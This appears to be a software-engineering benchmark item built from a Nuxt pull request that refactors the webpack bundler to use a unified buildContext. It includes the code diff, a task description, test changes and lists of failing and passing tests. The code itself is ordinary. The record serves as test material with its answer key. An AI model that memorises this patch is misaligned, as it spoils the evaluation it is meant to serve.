'./empty.js' : p.src @@ -78,7 +78,7 @@ export class WebpackBundler { } // Check styleResource existence - const { styleResources } = this.context.options.build + const { styleResources } = this.buildContext.options.build if (styleResources && Object.keys(styleResources).length) { consola.warn( 'Using styleResources without the nuxt-style-resources-module is not suggested and can lead to severe performance issues.', @@ -86,7 +86,7 @@ export class WebpackBundler { ) for (const ext of Object.keys(styleResources)) { await Promise.all(wrapArray(styleResources[ext]).map(async (p) => { - const styleResourceFiles = await glob(path.resolve(this.context.options.rootDir, p)) + const styleResourceFiles = await glob(path.resolve(this.buildContext.options.rootDir, p)) if (!styleResourceFiles || styleResourceFiles.length === 0) { throw new Error(`Style Resource not found: ${p}`) @@ -122,7 +122,7 @@ export class WebpackBundler { async webpackCompile(compiler) { const { name } = compiler.options - const { nuxt, options } = this.context + const { nuxt, options } = this.buildContext await nuxt.callHook('build:compile', { name, compiler }) @@ -179,7 +179,7 @@ export class WebpackBundler { consola.debug('Adding webpack middleware...') const { name } = compiler.options - const { nuxt: { server }, options } = this.context + const { nuxt: { server }, options } = this.buildContext const { client, ...hotMiddlewareOptions } = options.build.hotMiddleware || {} // Create webpack dev middleware @@ -255,6 +255,6 @@ export class WebpackBundler { } forGenerate() { - this.context.isStatic = true + this.buildContext.isStatic = true } } diff --git a/packages/webpack/src/config/base.js b/packages/webpack/src/config/base.js index 349a0e264..ee079da56 100644 --- a/packages/webpack/src/config/base.js +++ b/packages/webpack/src/config/base.js @@ -20,16 +20,9 @@ import WarnFixPlugin from '../plugins/warnfix' import { reservedVueTags } from '../utils/reserved-tags' export default class WebpackBaseConfig { - 
constructor(builder, options) { - this.name = options.name - this.isServer = options.isServer - this.isModern = options.isModern + constructor(builder) { this.builder = builder - this.nuxt = builder.context.nuxt - this.isStatic = builder.context.isStatic - this.options = builder.context.options - this.loaders = this.options.build.loaders - this.buildMode = this.options.dev ? 'development' : 'production' + this.buildContext = builder.buildContext this.modulesToTranspile = this.normalizeTranspile() } @@ -43,17 +36,29 @@ export default class WebpackBaseConfig { get nuxtEnv() { return { - isDev: this.options.dev, + isDev: this.dev, isServer: this.isServer, isClient: !this.isServer, isModern: !!this.isModern } } + get mode() { + return this.dev ? 'development' : 'production' + } + + get dev() { + return this.buildContext.options.dev + } + + get loaders() { + return this.buildContext.buildOptions.loaders + } + normalizeTranspile() { // include SFCs in node_modules const items = [/\.vue\.js/i] - for (const pattern of this.options.build.transpile) { + for (const pattern of this.buildContext.buildOptions.transpile) { if (pattern instanceof RegExp) { items.push(pattern) } else { @@ -65,7 +70,7 @@ export default class WebpackBaseConfig { } getBabelOptions() { - const options = clone(this.options.build.babel) + const options = clone(this.buildContext.buildOptions.babel) if (typeof options.presets === 'function') { options.presets = options.presets({ isServer: this.isServer }) @@ -86,11 +91,11 @@ export default class WebpackBaseConfig { } getFileName(key) { - let fileName = this.options.build.filenames[key] + let fileName = this.buildContext.buildOptions.filenames[key] if (typeof fileName === 'function') { fileName = fileName(this.nuxtEnv) } - if (this.options.dev) { + if (this.dev) { const hash = /\[(chunkhash|contenthash|hash)(?::(\d+))?]/.exec(fileName) if (hash) { consola.warn(`Notice: Please do not use ${hash[1]} in dev mode to prevent memory leak`) @@ -105,11 +110,11 @@ 
export default class WebpackBaseConfig { env() { const env = { - 'process.env.NODE_ENV': JSON.stringify(this.buildMode), - 'process.mode': JSON.stringify(this.options.mode), - 'process.static': this.isStatic + 'process.env.NODE_ENV': JSON.stringify(this.mode), + 'process.mode': JSON.stringify(this.mode), + 'process.static': this.buildContext.isStatic } - Object.entries(this.options.env).forEach(([key, value]) => { + Object.entries(this.buildContext.options.env).forEach(([key, value]) => { env['process.env.' + key] = ['boolean', 'number'].includes(typeof value) ? value @@ -119,19 +124,21 @@ export default class WebpackBaseConfig { } output() { + const { + options: { buildDir, router }, + buildOptions: { publicPath } + } = this.buildContext return { - path: path.resolve(this.options.buildDir, 'dist', this.isServer ? 'server' : 'client'), + path: path.resolve(buildDir, 'dist', this.isServer ? 'server' : 'client'), filename: this.getFileName('app'), futureEmitAssets: true, // TODO: Remove when using webpack 5 chunkFilename: this.getFileName('chunk'), - publicPath: isUrl(this.options.build.publicPath) - ? this.options.build.publicPath - : urlJoin(this.options.router.base, this.options.build.publicPath) + publicPath: isUrl(publicPath) ? 
publicPath : urlJoin(router.base, publicPath) } } optimization() { - const optimization = cloneDeep(this.options.build.optimization) + const optimization = cloneDeep(this.buildContext.buildOptions.optimization) if (optimization.minimize && optimization.minimizer === undefined) { optimization.minimizer = this.minimizer() @@ -142,13 +149,14 @@ export default class WebpackBaseConfig { minimizer() { const minimizer = [] + const { terser, cache } = this.buildContext.buildOptions // https://github.com/webpack-contrib/terser-webpack-plugin - if (this.options.build.terser) { + if (terser) { minimizer.push( new TerserWebpackPlugin(Object.assign({ parallel: true, - cache: this.options.build.cache, + cache, sourceMap: this.devtool && /source-?map/.test(this.devtool), extractComments: { filename: 'LICENSES' @@ -164,7 +172,7 @@ export default class WebpackBaseConfig { reserved: reservedVueTags } } - }, this.options.build.terser)) + }, terser)) ) } @@ -172,7 +180,7 @@ export default class WebpackBaseConfig { } alias() { - const { srcDir, rootDir, dir: { assets: assetsDir, static: staticDir } } = this.options + const { srcDir, rootDir, dir: { assets: assetsDir, static: staticDir } } = this.buildContext.options return { '~': path.join(srcDir), @@ -185,10 +193,9 @@ export default class WebpackBaseConfig { } rules() { - const perfLoader = new PerfLoader(this) + const perfLoader = new PerfLoader(this.name, this.buildContext) const styleLoader = new StyleLoader( - this.options, - this.nuxt, + this.buildContext, { isServer: this.isServer, perfLoader } ) const babelLoader = { @@ -329,25 +336,26 @@ export default class WebpackBaseConfig { plugins() { const plugins = [] + const { nuxt, buildOptions } = this.buildContext // Add timefix-plugin before others plugins - if (this.options.dev) { + if (this.dev) { plugins.push(new TimeFixPlugin()) } // CSS extraction) - if (this.options.build.extractCSS) { + if (buildOptions.extractCSS) { plugins.push(new ExtractCssChunksPlugin(Object.assign({ 
filename: this.getFileName('css'), chunkFilename: this.getFileName('css'), // TODO: https://github.com/faceyspacey/extract-css-chunks-webpack-plugin/issues/132 reloadAll: true - }, this.options.build.extractCSS))) + }, buildOptions.extractCSS))) } plugins.push(new VueLoader.VueLoaderPlugin()) - plugins.push(...(this.options.build.plugins || [])) + plugins.push(...(buildOptions.plugins || [])) // Hide warnings about plugins without a default export (#1179) plugins.push(new WarnFixPlugin()) @@ -362,37 +370,38 @@ export default class WebpackBaseConfig { 'profile', 'stats' ], - basic: !this.options.build.quiet && env.minimalCLI, - fancy: !this.options.build.quiet && !env.minimalCLI, - profile: !this.options.build.quiet && this.options.build.profile, - stats: !this.options.build.quiet && !this.options.dev && this.options.build.stats, + basic: !buildOptions.quiet && env.minimalCLI, + fancy: !buildOptions.quiet && !env.minimalCLI, + profile: !buildOptions.quiet && buildOptions.profile, + stats: !buildOptions.quiet && !this.dev && buildOptions.stats, reporter: { change: (_, { shortPath }) => { if (!this.isServer) { - this.nuxt.callHook('bundler:change', shortPath) + nuxt.callHook('bundler:change', shortPath) } }, - done: (context) => { - if (context.hasErrors) { - this.nuxt.callHook('bundler:error') + done: (buildContext) => { + if (buildContext.hasErrors) { + nuxt.callHook('bundler:error') } }, allDone: () => { - this.nuxt.callHook('bundler:done') + nuxt.callHook('bundler:done') } } })) - if (this.options.build.hardSource) { - plugins.push(new HardSourcePlugin(Object.assign({}, this.options.build.hardSource))) + if (buildOptions.hardSource) { + plugins.push(new HardSourcePlugin(Object.assign({}, buildOptions.hardSource))) } return plugins } extendConfig(config) { - if (typeof this.options.build.extend === 'function') { - const extendedConfig = this.options.build.extend.call( + const { extend } = this.buildContext.buildOptions + if (typeof extend === 'function') { + const 
extendedConfig = extend.call( this.builder, config, { loaders: this.loaders, ...this.nuxtEnv } ) // Only overwrite config when something is returned for backwards compatibility @@ -405,17 +414,17 @@ export default class WebpackBaseConfig { config() { // Prioritize nested node_modules in webpack search path (#2558) - const webpackModulesDir = ['node_modules'].concat(this.options.modulesDir) + const webpackModulesDir = ['node_modules'].concat(this.buildContext.options.modulesDir) const config = { name: this.name, - mode: this.buildMode, + mode: this.mode, devtool: this.devtool, optimization: this.optimization(), output: this.output(), performance: { maxEntrypointSize: 1000 * 1024, - hints: this.options.dev ? false : 'warning' + hints: this.dev ? false : 'warning' }, resolve: { extensions: ['.wasm', '.mjs', '.js', '.json', '.vue', '.jsx', '.ts', '.tsx'], diff --git a/packages/webpack/src/config/client.js b/packages/webpack/src/config/client.js index 68589eb44..dc1c9078d 100644 --- a/packages/webpack/src/config/client.js +++ b/packages/webpack/src/config/client.js @@ -14,12 +14,15 @@ import VueSSRClientPlugin from '../plugins/vue/client' import WebpackBaseConfig from './base' export default class WebpackClientConfig extends WebpackBaseConfig { - constructor(builder, options) { - super(builder, options || { name: 'client', isServer: false }) + constructor(builder) { + super(builder) + this.name = 'client' + this.isServer = false + this.isModern = false } getFileName(...args) { - if (this.options.build.analyze) { + if (this.buildContext.buildOptions.analyze) { const [key] = args if (['app', 'chunk'].includes(key)) { return `${this.isModern ? 
'modern-' : ''}[name].js` @@ -44,7 +47,7 @@ export default class WebpackClientConfig extends WebpackBaseConfig { // Small, known and common modules which are usually used project-wise // Sum of them may not be more than 244 KiB if ( - this.options.build.splitChunks.commons === true && + this.buildContext.buildOptions.splitChunks.commons === true && optimization.splitChunks.cacheGroups.commons === undefined ) { optimization.splitChunks.cacheGroups.commons = { @@ -60,14 +63,13 @@ export default class WebpackClientConfig extends WebpackBaseConfig { minimizer() { const minimizer = super.minimizer() + const { optimizeCSS } = this.buildContext.buildOptions // https://github.com/NMFR/optimize-css-assets-webpack-plugin // https://github.com/webpack-contrib/mini-css-extract-plugin#minimizing-for-production // TODO: Remove OptimizeCSSAssetsPlugin when upgrading to webpack 5 - if (this.options.build.optimizeCSS) { - minimizer.push( - new OptimizeCSSAssetsPlugin(Object.assign({}, this.options.build.optimizeCSS)) - ) + if (optimizeCSS) { + minimizer.push(new OptimizeCSSAssetsPlugin(Object.assign({}, optimizeCSS))) } return minimizer @@ -75,14 +77,15 @@ export default class WebpackClientConfig extends WebpackBaseConfig { plugins() { const plugins = super.plugins() + const { buildOptions, options: { appTemplatePath, buildDir, rootDir, modern } } = this.buildContext // Generate output HTML for SSR - if (this.options.build.ssr) { + if (buildOptions.ssr) { plugins.push( new HTMLPlugin({ filename: '../server/index.ssr.html', - template: this.options.appTemplatePath, - minify: this.options.build.html.minify, + template: appTemplatePath, + minify: buildOptions.html.minify, inject: false // Resources will be injected using bundleRenderer }) ) @@ -91,8 +94,8 @@ export default class WebpackClientConfig extends WebpackBaseConfig { plugins.push( new HTMLPlugin({ filename: '../server/index.spa.html', - template: this.options.appTemplatePath, - minify: this.options.build.html.minify, + 
template: appTemplatePath, + minify: buildOptions.html.minify, inject: true, chunksSortMode: 'dependency' }), @@ -102,53 +105,53 @@ export default class WebpackClientConfig extends WebpackBaseConfig { new webpack.DefinePlugin(this.env()) ) - if (this.options.dev) { + if (this.dev) { // TODO: webpackHotUpdate is not defined: https://github.com/webpack/webpack/issues/6693 plugins.push(new webpack.HotModuleReplacementPlugin()) } // Webpack Bundle Analyzer // https://github.com/webpack-contrib/webpack-bundle-analyzer - if (!this.options.dev && this.options.build.analyze) { - const statsDir = path.resolve(this.options.buildDir, 'stats') + if (!this.dev && buildOptions.analyze) { + const statsDir = path.resolve(buildDir, 'stats') plugins.push(new BundleAnalyzer.BundleAnalyzerPlugin(Object.assign({ analyzerMode: 'static', defaultSizes: 'gzip', generateStatsFile: true, - openAnalyzer: !this.options.build.quiet, + openAnalyzer: !buildOptions.quiet, reportFilename: path.resolve(statsDir, `${this.name}.html`), statsFilename: path.resolve(statsDir, `${this.name}.json`) - }, this.options.build.analyze))) + }, buildOptions.analyze))) } - if (this.options.modern) { + if (modern) { plugins.push(new ModernModePlugin({ - targetDir: path.resolve(this.options.buildDir, 'dist', 'client'), + targetDir: path.resolve(buildDir, 'dist', 'client'), isModernBuild: this.isModern })) } - if (this.options.build.crossorigin) { + if (buildOptions.crossorigin) { plugins.push(new CorsPlugin({ - crossorigin: this.options.build.crossorigin + crossorigin: buildOptions.crossorigin })) } // TypeScript type checker // Only performs once per client compilation and only if `ts-loader` checker is not used (transpileOnly: true) - if (!this.isModern && this.loaders.ts.transpileOnly && this.options.build.useForkTsChecker) { - const forkTsCheckerResolvedPath = this.nuxt.resolver.resolveModule('fork-ts-checker-webpack-plugin') + if (!this.isModern && this.loaders.ts.transpileOnly && buildOptions.useForkTsChecker) 
{ + const forkTsCheckerResolvedPath = this.buildContext.nuxt.resolver.resolveModule('fork-ts-checker-webpack-plugin') if (forkTsCheckerResolvedPath) { const ForkTsCheckerWebpackPlugin = require(forkTsCheckerResolvedPath) plugins.push(new ForkTsCheckerWebpackPlugin(Object.assign({ vue: true, - tsconfig: path.resolve(this.options.rootDir, 'tsconfig.json'), + tsconfig: path.resolve(rootDir, 'tsconfig.json'), // https://github.com/Realytics/fork-ts-checker-webpack-plugin#options - tslint: boolean | string - So we set it false if file not found - tslint: (tslintPath => fs.existsSync(tslintPath) && tslintPath)(path.resolve(this.options.rootDir, 'tslint.json')), + tslint: (tslintPath => fs.existsSync(tslintPath) && tslintPath)(path.resolve(rootDir, 'tslint.json')), formatter: 'codeframe', logger: consola - }, this.options.build.useForkTsChecker))) + }, buildOptions.useForkTsChecker))) } else { consola.warn('You need to install `fork-ts-checker-webpack-plugin` as devDependency to enable TypeScript type checking !') } @@ -159,8 +162,12 @@ export default class WebpackClientConfig extends WebpackBaseConfig { config() { const config = super.config() + const { + options: { router, buildDir }, + buildOptions: { hotMiddleware, quiet, friendlyErrors } + } = this.buildContext - const { client = {} } = this.options.build.hotMiddleware || {} + const { client = {} } = hotMiddleware || {} const { ansiColors, overlayStyles, ...options } = client const hotMiddlewareClientOptions = { reload: true, @@ -170,17 +177,17 @@ export default class WebpackClientConfig extends WebpackBaseConfig { ...options, name: this.name } - const clientPath = `${this.options.router.base}/__webpack_hmr/${this.name}` + const clientPath = `${router.base}/__webpack_hmr/${this.name}` const hotMiddlewareClientOptionsStr = `${querystring.stringify(hotMiddlewareClientOptions)}&path=${clientPath}`.replace(/\/\//g, '/') // Entry points config.entry = { - app: [path.resolve(this.options.buildDir, 'client.js')] + app: 
[path.resolve(buildDir, 'client.js')] } // Add HMR support - if (this.options.dev) { + if (this.dev) { config.entry.app.unshift( // https://github.com/webpack-contrib/webpack-hot-middleware/issues/53#issuecomment-162823945 'eventsource-polyfill', @@ -190,7 +197,7 @@ export default class WebpackClientConfig extends WebpackBaseConfig { } // Add friendly error plugin - if (this.options.dev && !this.options.build.quiet && this.options.build.friendlyErrors) { + if (this.dev && !quiet && friendlyErrors) { config.plugins.push( new FriendlyErrorsWebpackPlugin({ clearConsole: false, diff --git a/packages/webpack/src/config/modern.js b/packages/webpack/src/config/modern.js index 8431de582..27512b2a4 100644 --- a/packages/webpack/src/config/modern.js +++ b/packages/webpack/src/config/modern.js @@ -2,8 +2,10 @@ import clone from 'lodash/clone' import WebpackClientConfig from './client' export default class WebpackModernConfig extends WebpackClientConfig { - constructor(builder) { - super(builder, { name: 'modern', isServer: false, isModern: true }) + constructor(...args) { + super(...args) + this.name = 'modern' + this.isModern = true } env() { @@ -13,7 +15,7 @@ export default class WebpackModernConfig extends WebpackClientConfig { } getBabelOptions() { - const options = clone(this.options.build.babel) + const options = clone(this.buildContext.buildOptions.babel) options.presets = [ [ diff --git a/packages/webpack/src/config/server.js b/packages/webpack/src/config/server.js index f2e34f104..548267834 100644 --- a/packages/webpack/src/config/server.js +++ b/packages/webpack/src/config/server.js @@ -9,8 +9,10 @@ import VueSSRServerPlugin from '../plugins/vue/server' import WebpackBaseConfig from './base' export default class WebpackServerConfig extends WebpackBaseConfig { - constructor(builder) { - super(builder, { name: 'server', isServer: true }) + constructor(...args) { + super(...args) + this.name = 'server' + this.isServer = true this.whitelist = this.normalizeWhitelist() } 
@@ -18,7 +20,7 @@ export default class WebpackServerConfig extends WebpackBaseConfig { const whitelist = [ /\.(?!js(x|on)?$)/i ] - for (const pattern of this.options.build.transpile) { + for (const pattern of this.buildContext.buildOptions.transpile) { if (pattern instanceof RegExp) { whitelist.push(pattern) } else { @@ -68,7 +70,7 @@ export default class WebpackServerConfig extends WebpackBaseConfig { target: 'node', node: false, entry: { - app: [path.resolve(this.options.buildDir, 'server.js')] + app: [path.resolve(this.buildContext.options.buildDir, 'server.js')] }, output: Object.assign({}, config.output, { filename: 'server.js', @@ -85,8 +87,8 @@ export default class WebpackServerConfig extends WebpackBaseConfig { // https://webpack.js.org/configuration/externals/#externals // https://github.com/liady/webpack-node-externals // https://vue-loader.vuejs.org/migrating.html#ssr-externals - if (!this.options.build.standalone) { - this.options.modulesDir.forEach((dir) => { + if (!this.buildContext.buildOptions.standalone) { + this.buildContext.options.modulesDir.forEach((dir) => { if (fs.existsSync(dir)) { config.externals.push( nodeExternals({ diff --git a/packages/webpack/src/utils/perf-loader.js b/packages/webpack/src/utils/perf-loader.js index 7fff23f8c..490d82929 100644 --- a/packages/webpack/src/utils/perf-loader.js +++ b/packages/webpack/src/utils/perf-loader.js @@ -6,10 +6,10 @@ import { warmup } from 'thread-loader' // https://github.com/webpack-contrib/cache-loader export default class PerfLoader { - constructor(config) { - this.name = config.name - this.options = config.options - this.workerPools = PerfLoader.defaultPools(this.options) + constructor(name, buildContext) { + this.name = name + this.buildContext = buildContext + this.workerPools = PerfLoader.defaultPools({ dev: buildContext.options.dev }) return new Proxy(this, { get(target, name) { return target[name] ? 
target[name] : target.use.bind(target, name) @@ -25,13 +25,13 @@ export default class PerfLoader { } } - static warmupAll(options) { - options = PerfLoader.defaultPools(options) - PerfLoader.warmup(options.js, [ + static warmupAll({ dev }) { + const pools = PerfLoader.defaultPools({ dev }) + PerfLoader.warmup(pools.js, [ require.resolve('babel-loader'), require.resolve('@babel/preset-env') ]) - PerfLoader.warmup(options.css, ['css-loader']) + PerfLoader.warmup(pools.css, ['css-loader']) } static warmup(...args) { @@ -41,7 +41,7 @@ export default class PerfLoader { use(poolName) { const loaders = [] - if (this.options.build.cache) { + if (this.buildContext.buildOptions.cache) { loaders.push({ loader: 'cache-loader', options: { @@ -50,7 +50,7 @@ export default class PerfLoader { }) } - if (this.options.build.parallel) { + if (this.buildContext.buildOptions.parallel) { const pool = this.workerPools[poolName] if (pool) { loaders.push({ diff --git a/packages/webpack/src/utils/postcss.js b/packages/webpack/src/utils/postcss.js index 0e82a78c2..0f3246948 100644 --- a/packages/webpack/src/utils/postcss.js +++ b/packages/webpack/src/utils/postcss.js @@ -19,34 +19,29 @@ export const orderPresets = { } export default class PostcssConfig { - constructor(options, nuxt) { - this.nuxt = nuxt - this.dev = options.dev - this.postcss = options.build.postcss - this.srcDir = options.srcDir - this.rootDir = options.rootDir - this.cssSourceMap = options.build.cssSourceMap - this.modulesDir = options.modulesDir + constructor(buildContext) { + this.buildContext = buildContext + } + + get postcssOptions() { + return this.buildContext.buildOptions.postcss } get defaultConfig() { + const { dev, srcDir, rootDir, modulesDir } = this.buildContext.options return { - sourceMap: this.cssSourceMap, + sourceMap: this.buildContext.buildOptions.cssSourceMap, plugins: { // https://github.com/postcss/postcss-import 'postcss-import': { resolve: createResolver({ alias: { - '~': path.join(this.srcDir), - 
'~~': path.join(this.rootDir), - '@': path.join(this.srcDir), - '@@': path.join(this.rootDir) + '~': path.join(srcDir), + '~~': path.join(rootDir), + '@': path.join(srcDir), + '@@': path.join(rootDir) }, - modules: [ - this.srcDir, - this.rootDir, - ...this.modulesDir - ] + modules: [ srcDir, rootDir, ...modulesDir ] }) }, @@ -55,7 +50,7 @@ export default class PostcssConfig { // https://github.com/csstools/postcss-preset-env 'postcss-preset-env': this.preset || {}, - 'cssnano': this.dev ? false : { preset: 'default' } + 'cssnano': dev ? false : { preset: 'default' } }, // Array, String or Function order: 'cssnanoLast' @@ -65,7 +60,8 @@ export default class PostcssConfig { searchConfigFile() { // Search for postCSS config file and use it if exists // https://github.com/michael-ciniawsky/postcss-load-config - for (const dir of [this.srcDir, this.rootDir]) { + const { srcDir, rootDir } = this.buildContext.options + for (const dir of [ srcDir, rootDir ]) { for (const file of [ 'postcss.config.js', '.postcssrc.js', @@ -82,12 +78,12 @@ export default class PostcssConfig { } configFromFile() { - const loaderConfig = (this.postcss && this.postcss.config) || {} + const loaderConfig = (this.postcssOptions && this.postcssOptions.config) || {} loaderConfig.path = loaderConfig.path || this.searchConfigFile() if (loaderConfig.path) { return { - sourceMap: this.cssSourceMap, + sourceMap: this.buildContext.buildOptions.cssSourceMap, config: loaderConfig } } @@ -117,7 +113,7 @@ export default class PostcssConfig { // Map postcss plugins into instances on object mode once config.plugins = this.sortPlugins(config) .map((p) => { - const plugin = this.nuxt.resolver.requireModule(p) + const plugin = this.buildContext.nuxt.resolver.requireModule(p) const opts = plugins[p] if (opts === false) { return // Disabled @@ -130,7 +126,7 @@ export default class PostcssConfig { config() { /* istanbul ignore if */ - if (!this.postcss) { + if (!this.postcssOptions) { return false } @@ -139,7 +135,7 
@@ export default class PostcssConfig { return config } - config = this.normalize(cloneDeep(this.postcss)) + config = this.normalize(cloneDeep(this.postcssOptions)) // Apply default plugins if (isPureObject(config)) { diff --git a/packages/webpack/src/utils/style-loader.js b/packages/webpack/src/utils/style-loader.js index be247b99a..b6fb589f1 100644 --- a/packages/webpack/src/utils/style-loader.js +++ b/packages/webpack/src/utils/style-loader.js @@ -6,24 +6,20 @@ import { wrapArray } from '@nuxt/utils' import PostcssConfig from './postcss' export default class StyleLoader { - constructor(options, nuxt, { isServer, perfLoader }) { + constructor(buildContext, { isServer, perfLoader }) { + this.buildContext = buildContext this.isServer = isServer this.perfLoader = perfLoader - this.rootDir = options.rootDir - this.loaders = { - vueStyle: options.build.loaders.vueStyle, - css: options.build.loaders.css, - cssModules: options.build.loaders.cssModules - } - this.extractCSS = options.build.extractCSS - this.resources = options.build.styleResources - this.sourceMap = Boolean(options.build.cssSourceMap) - if (options.build.postcss) { - this.postcssConfig = new PostcssConfig(options, nuxt) + if (buildContext.options.build.postcss) { + this.postcssConfig = new PostcssConfig(buildContext) } } + get extractCSS() { + return this.buildContext.buildOptions.extractCSS + } + get exportOnlyLocals() { return Boolean(this.isServer && this.extractCSS) } @@ -34,19 +30,20 @@ export default class StyleLoader { } styleResource(ext) { - const extResource = this.resources[ext] + const { buildOptions: { styleResources }, options: { rootDir } } = this.buildContext + const extResource = styleResources[ext] // style-resources-loader // https://github.com/yenshih/style-resources-loader if (!extResource) { return } - const patterns = wrapArray(extResource).map(p => path.resolve(this.rootDir, p)) + const patterns = wrapArray(extResource).map(p => path.resolve(rootDir, p)) return { loader: 
'style-resources-loader', options: Object.assign( { patterns }, - this.resources.options || {} + styleResources.options || {} ) } } @@ -66,7 +63,7 @@ export default class StyleLoader { return { loader: 'postcss-loader', - options: Object.assign({ sourceMap: this.sourceMap }, config) + options: Object.assign({ sourceMap: this.buildContext.buildOptions.cssSourceMap }, config) } } @@ -94,32 +91,34 @@ export default class StyleLoader { styleLoader() { return this.extract() || { loader: 'vue-style-loader', - options: this.loaders.vueStyle + options: this.buildContext.buildOptions.loaders.vueStyle } } apply(ext, loaders = []) { + const { css, cssModules } = this.buildContext.buildOptions.loaders + const customLoaders = [].concat( this.postcss(), this.normalize(loaders), this.styleResource(ext) ).filter(Boolean) - this.loaders.css.importLoaders = this.loaders.cssModules.importLoaders = customLoaders.length + css.importLoaders = cssModules.importLoaders = customLoaders.length return [ // This matches <style module> { resourceQuery: /module/, use: this.perfLoader.css().concat( - this.cssModules(this.loaders.cssModules), + this.cssModules(cssModules), customLoaders ) }, // This matches plain <style> or <style scoped> { use: this.perfLoader.css().concat( - this.css(this.loaders.css), + this.css(css), customLoaders ) }
refactor: unify context in webpack module <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [ ] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [ ] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Unify build context handling across the webpack bundler and its configuration classes **Problem** Various parts of the webpack integration accessed build‑related settings through different paths, leading to fragmented and sometimes out‑of‑sync configuration data. This made it hard to guarantee that the bundler, loaders, and plugins all operated on the same set of options, especially when toggling development mode, static generation, or custom build flags. **Root Cause** The builder passed a generic context that mixed runtime and build settings, and the code repeatedly reached into nested option objects instead of a single source of truth. **Fix / Expected Behavior** - Introduce a dedicated build context that encapsulates all build‑specific options. - Refactor the bundler and all webpack configuration classes to retrieve settings exclusively from this unified build context. - Update constructors and internal references so that loaders, plugins, and utility helpers consistently use the new build context. - Ensure derived values (e.g., dev vs. production mode, public paths, static flag, style resources, loader configurations) are correctly reflected throughout the build pipeline. - Preserve existing functionality such as hot‑module replacement, CSS extraction, modern build handling, and build‑time hooks while using the unified source. **Risk & Validation** - Run the full test suite to detect regressions in both development and production builds. - Manually verify that builds succeed with custom options (e.g., extractCSS, analyze, styleResources) and that generated assets and server bundles are unchanged. - Confirm that static generation mode correctly sets the static flag and that hot‑middleware operates as expected in dev mode.
5,054
nuxt/nuxt.js
diff --git a/packages/builder/test/context/build.test.js b/packages/builder/test/context/build.test.js index 693d96ed2..a067add15 100644 --- a/packages/builder/test/context/build.test.js +++ b/packages/builder/test/context/build.test.js @@ -20,4 +20,14 @@ describe('builder: buildContext', () => { const context = new BuildContext(builder) expect(context.plugins).toEqual(builder.plugins) }) + + test('should return builder build options', () => { + const buildOptions = { id: 'test-build-options' } + const builder = { + plugins: [], + nuxt: { options: { build: buildOptions } } + } + const context = new BuildContext(builder) + expect(context.buildOptions).toEqual(buildOptions) + }) }) diff --git a/test/unit/basic.generate.test.js b/test/unit/basic.generate.test.js index 371165dd1..d391efe5e 100644 --- a/test/unit/basic.generate.test.js +++ b/test/unit/basic.generate.test.js @@ -46,7 +46,7 @@ describe('basic generate', () => { }) test('Check builder', () => { - expect(builder.bundleBuilder.context.isStatic).toBe(true) + expect(builder.bundleBuilder.buildContext.isStatic).toBe(true) expect(builder.build).toHaveBeenCalledTimes(1) }) diff --git a/test/unit/wp.config.test.js b/test/unit/wp.config.test.js index 500ec8528..04af2f43d 100644 --- a/test/unit/wp.config.test.js +++ b/test/unit/wp.config.test.js @@ -15,16 +15,18 @@ describe('webpack configuration', () => { ]) expect(PerfLoader.warmup).toHaveBeenCalledWith(css, ['css-loader']) - const perfLoader = new PerfLoader({ - name: 'test-perf', - options: { - dev: true, - build: { + const perfLoader = new PerfLoader( + 'test-perf', + { + options: { + dev: true + }, + buildOptions: { parallel: true, cache: true } } - }) + ) expect(perfLoader.workerPools).toMatchObject({ js, css }) const loaders = perfLoader.use('js') const cacheDirectory = path.resolve('node_modules/.cache/cache-loader/test-perf')
[ "should return builder build options" ]
[ "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "should export Module, Nuxt and Resolver", "should get context with req and res", "should get correct globals", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should export Builder", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export getDefaultNuxtConfig and getNuxtConfig", "should export Generator", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return globals with given globalName", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module 
not found", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should export all methods from utils folder", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should construct context", "should return builder plugins context", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore" ]
